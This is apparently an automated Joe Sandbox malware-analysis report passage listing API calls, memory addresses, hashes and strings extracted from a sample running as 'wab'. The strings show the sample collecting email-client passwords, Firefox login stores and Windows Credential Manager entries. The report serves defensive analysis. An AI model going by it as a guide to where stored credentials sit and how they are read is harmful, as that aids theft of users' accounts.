                                                              • String ID: Arial
                                                              • API String ID: 3853255127-493054409
                                                              APIs
                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strlen$_strcmpimemset
                                                              • String ID: /stext
                                                              • API String ID: 520177685-3817206916
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 0044B43E
                                                              • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 0044B452
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              APIs
                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID:
                                                              • API String ID: 145871493-0
                                                              APIs
                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                              • String ID:
                                                              • API String ID: 4165544737-0
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              APIs
                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              APIs
                                                              • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              APIs
                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                              • API String ID: 3963849919-1658304561
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID: (yE$(yE$(yE
                                                              • API String ID: 1865533344-362086290
                                                              APIs
                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                              • memset.MSVCRT ref: 0040E5B8
                                                              • memset.MSVCRT ref: 0040E5CD
                                                              • _mbscpy.MSVCRT ref: 0040E634
                                                              • _mbscpy.MSVCRT ref: 0040E64A
                                                              • _mbscpy.MSVCRT ref: 0040E660
                                                              • _mbscpy.MSVCRT ref: 0040E676
                                                              • _mbscpy.MSVCRT ref: 0040E68C
                                                              • _mbscpy.MSVCRT ref: 0040E69F
                                                              • memset.MSVCRT ref: 0040E6B5
                                                              • memset.MSVCRT ref: 0040E6CC
                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                              • memset.MSVCRT ref: 0040E736
                                                              • memset.MSVCRT ref: 0040E74F
                                                              • sprintf.MSVCRT ref: 0040E76D
                                                              • sprintf.MSVCRT ref: 0040E788
                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                              • memset.MSVCRT ref: 0040E858
                                                              • sprintf.MSVCRT ref: 0040E873
                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                              • API String ID: 4171719235-3943159138
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                              • GetDC.USER32 ref: 004104E2
                                                              • strlen.MSVCRT ref: 00410522
                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                              • sprintf.MSVCRT ref: 00410640
                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 1703216249-3046471546
                                                              APIs
                                                              • memset.MSVCRT ref: 004024F5
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              • _mbscpy.MSVCRT ref: 00402533
                                                              • _mbscpy.MSVCRT ref: 004025FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$QueryValuememset
                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                              • API String ID: 168965057-606283353
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                              • memset.MSVCRT ref: 0040128E
                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                              • String ID:
                                                              • API String ID: 2998058495-0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                              • API String ID: 231171946-2189169393
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 633282248-1996832678
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: sprintf$memset$_mbscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 3402215030-3842416460
                                                              APIs
                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                              • strlen.MSVCRT ref: 0040F139
                                                              • strlen.MSVCRT ref: 0040F147
                                                              • memset.MSVCRT ref: 0040F187
                                                              • strlen.MSVCRT ref: 0040F196
                                                              • strlen.MSVCRT ref: 0040F1A4
                                                              • memset.MSVCRT ref: 0040F1EA
                                                              • strlen.MSVCRT ref: 0040F1F9
                                                              • strlen.MSVCRT ref: 0040F207
                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                              • _mbscpy.MSVCRT ref: 0040F2CD
                                                              • _mbscpy.MSVCRT ref: 0040F30E
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                              • API String ID: 1613542760-3138536805
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                              • API String ID: 1012775001-1343505058
                                                              APIs
                                                              • memset.MSVCRT ref: 00444612
                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                              • strlen.MSVCRT ref: 0044462E
                                                              • memset.MSVCRT ref: 00444668
                                                              • memset.MSVCRT ref: 0044467C
                                                              • memset.MSVCRT ref: 00444690
                                                              • memset.MSVCRT ref: 004446B6
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                              • memcpy.MSVCRT ref: 004446ED
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                              • memcpy.MSVCRT ref: 00444729
                                                              • memcpy.MSVCRT ref: 0044473B
                                                              • _mbscpy.MSVCRT ref: 00444812
                                                              • memcpy.MSVCRT ref: 00444843
                                                              • memcpy.MSVCRT ref: 00444855
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                              • String ID: salu
                                                              • API String ID: 3691931180-4177317985
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                              • API String ID: 2449869053-232097475
                                                              APIs
                                                              • sprintf.MSVCRT ref: 0040957B
                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                              • sprintf.MSVCRT ref: 004095EB
                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                              • memset.MSVCRT ref: 0040961C
                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                              • String ID: caption$dialog_%d$menu_%d
                                                              • API String ID: 3259144588-3822380221
                                                              APIs
                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                              • API String ID: 2449869053-4258758744
                                                              APIs
                                                              • wcsstr.MSVCRT ref: 0040426A
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                              • _mbscpy.MSVCRT ref: 004042D5
                                                              • _mbscpy.MSVCRT ref: 004042E8
                                                              • strchr.MSVCRT ref: 004042F6
                                                              • strlen.MSVCRT ref: 0040430A
                                                              • sprintf.MSVCRT ref: 0040432B
                                                              • strchr.MSVCRT ref: 0040433C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                              • String ID: %s@gmail.com$www.google.com
                                                              • API String ID: 3866421160-4070641962
                                                              • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                              • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                              • API String ID: 2360744853-2229823034
                                                              • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                              • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                              APIs
                                                              • strchr.MSVCRT ref: 004100E4
                                                              • _mbscpy.MSVCRT ref: 004100F2
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                              • _mbscpy.MSVCRT ref: 00410142
                                                              • _mbscat.MSVCRT ref: 0041014D
                                                              • memset.MSVCRT ref: 00410129
                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                              • memset.MSVCRT ref: 00410171
                                                              • memcpy.MSVCRT ref: 0041018C
                                                              • _mbscat.MSVCRT ref: 00410197
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                              • String ID: \systemroot
                                                              • API String ID: 912701516-1821301763
                                                              • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                              • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$strlen
                                                              • String ID: -journal$-wal$immutable$nolock
                                                              • API String ID: 2619041689-3408036318
                                                              • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
